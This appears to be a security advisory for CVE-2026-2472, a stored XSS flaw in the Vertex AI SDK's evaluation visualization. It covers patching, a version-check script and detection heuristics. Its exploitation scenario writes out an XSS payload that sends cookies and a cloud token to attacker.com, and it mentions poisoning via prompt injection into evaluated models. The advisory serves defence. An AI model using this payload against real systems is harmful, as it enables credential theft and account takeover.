CVE-2026-2472: google-cloud-aiplatform: XSS enables session hijacking

GHSA-qv8j-hgpc-vrq8 HIGH
Published February 20, 2026
CISO Take

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Risk Assessment

High business impact despite low EPSS (0.00064) and no CISA KEV inclusion. Jupyter and Colab environments are disproportionately dangerous XSS targets: they routinely hold Google Cloud OAuth tokens, service account keys, and direct access to production data pipelines and model artifacts. The attack requires no authentication—only the ability to influence evaluation dataset content or model outputs, which is achievable via adversarial prompts, poisoned datasets, or indirect prompt injection into evaluated models. A public PoC (github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud) lowers the exploitation bar further. No confirmed active exploitation in the wild as of analysis date.

Affected Systems

Package: google-cloud-aiplatform
Ecosystem: pip
Vulnerable Range: >= 1.98.0, < 1.131.0
Patched: 1.131.0

Do you use google-cloud-aiplatform at version 1.98.0 or later, but below 1.131.0? You're affected.
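A quick way to check a given environment is to compare the installed SDK version against the vulnerable range. The sketch below is a minimal audit helper (not part of the SDK); it uses a simplified X.Y.Z comparison, which is sufficient because release versions of google-cloud-aiplatform follow that scheme.

```python
# Audit sketch: is the installed google-cloud-aiplatform inside the
# vulnerable range [1.98.0, 1.131.0)?
from importlib.metadata import version, PackageNotFoundError

def parse(v: str) -> tuple:
    # "1.98.0" -> (1, 98, 0); tuples compare element-wise,
    # so (1, 130, 1) < (1, 131, 0) as expected
    return tuple(int(part) for part in v.split("."))

def is_vulnerable(installed: str) -> bool:
    return parse("1.98.0") <= parse(installed) < parse("1.131.0")

try:
    installed = version("google-cloud-aiplatform")
    print(installed, "VULNERABLE" if is_vulnerable(installed) else "OK")
except PackageNotFoundError:
    print("google-cloud-aiplatform is not installed")
```

The same check can be run against pinned versions in requirements files or lockfiles when auditing CI/CD pipelines (step 6 below).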

Severity & Risk

CVSS 3.1: N/A
EPSS: 0.1% chance of exploitation in 30 days (higher than 25% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Moderate

Recommended Action

  1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform.

  2. WORKAROUND

    Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.

  3. DETECTION

    Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.

  4. INPUT CONTROL

    Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.

  5. CREDENTIAL HYGIENE

    If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.

  6. SCOPE

    Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
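The detection step above can be sketched as a pre-render screening pass over evaluation dataset JSON. This is a hypothetical helper (the function and pattern names are not from the SDK), and the regexes are a heuristic for the vectors named in step 3, not a complete HTML sanitizer.

```python
import json
import re

# Heuristic patterns for the XSS vectors named in the detection step:
# script tags, inline event handlers, and javascript: URIs.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.IGNORECASE),
    re.compile(r"\bon(?:error|load|click)\s*=", re.IGNORECASE),
    re.compile(r"javascript\s*:", re.IGNORECASE),
]

def find_suspicious_strings(node, path="$"):
    """Recursively walk a JSON-like structure and return
    (json_path, value) pairs for strings matching any heuristic."""
    hits = []
    if isinstance(node, str):
        if any(p.search(node) for p in XSS_PATTERNS):
            hits.append((path, node))
    elif isinstance(node, dict):
        for key, value in node.items():
            hits.extend(find_suspicious_strings(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_suspicious_strings(value, f"{path}[{i}]"))
    return hits

dataset = json.loads('{"rows": [{"response": "<img src=x onerror=alert(1)>"}]}')
print(find_suspicious_strings(dataset))
```

Flagged entries should be quarantined for review rather than silently stripped, since stripping can hide an active poisoning attempt.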

CISA SSVC Assessment

Decision: Track
Exploitation: none
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.3 - AI System Inputs
A.6.2.6 - AI System Security
A.8.4 - AI Data Quality and Integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place that address AI risks associated with third-party entities
MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems
OWASP LLM Top 10
LLM02:2025 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-2472?

CVE-2026-2472 is a stored cross-site scripting (XSS) vulnerability in the _genai/_evals_visualization component of the Google Cloud Vertex AI SDK (google-cloud-aiplatform), affecting versions 1.98.0 up to but not including 1.131.0. An unauthenticated remote attacker who can influence model evaluation results or dataset JSON can execute arbitrary JavaScript in a victim's Jupyter or Colab session, enabling cloud credential theft and account takeover. A public PoC exists on GitHub; the fix is to upgrade to version 1.131.0.

Is CVE-2026-2472 actively exploited?

No confirmed active exploitation of CVE-2026-2472 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-2472?

1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 with pip install --upgrade google-cloud-aiplatform; verify with pip show google-cloud-aiplatform.
2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

What systems are affected by CVE-2026-2472?

This vulnerability affects the following AI/ML architecture patterns: model evaluation pipelines, AI development workspaces, Vertex AI workflows, Jupyter and Colab ML environments, LLM evaluation frameworks, automated ML pipelines with visualization.

What is the CVSS score for CVE-2026-2472?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.

Exploitation Scenario

An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
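The scenario hinges on attacker-controlled strings being interpolated into visualization HTML unescaped. The minimal sketch below (hypothetical code, not the SDK's internals) shows why the workaround of escaping untrusted values before rendering neutralizes this class of payload: the browser then displays the payload as text instead of parsing it as markup.

```python
import html

# Attacker-controlled string of the kind described in the scenario above
payload = '<img src=x onerror=fetch("https://attacker.example/exfil")>'

# Vulnerable pattern: raw interpolation into HTML rendered in the notebook,
# so the browser parses the <img> tag and fires its onerror handler
unsafe = f"<td>{payload}</td>"

# Mitigated pattern: html.escape converts <, >, &, and quotes to entities,
# so the payload is displayed as inert text
safe = f"<td>{html.escape(payload)}</td>"

print(safe)
```

This is the standard defense for untrusted data in server-generated HTML; it complements, rather than replaces, the dataset screening in step 3 of the recommended actions.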

Timeline

Published
February 20, 2026
Last Modified
February 27, 2026
First Seen
March 24, 2026

Related Vulnerabilities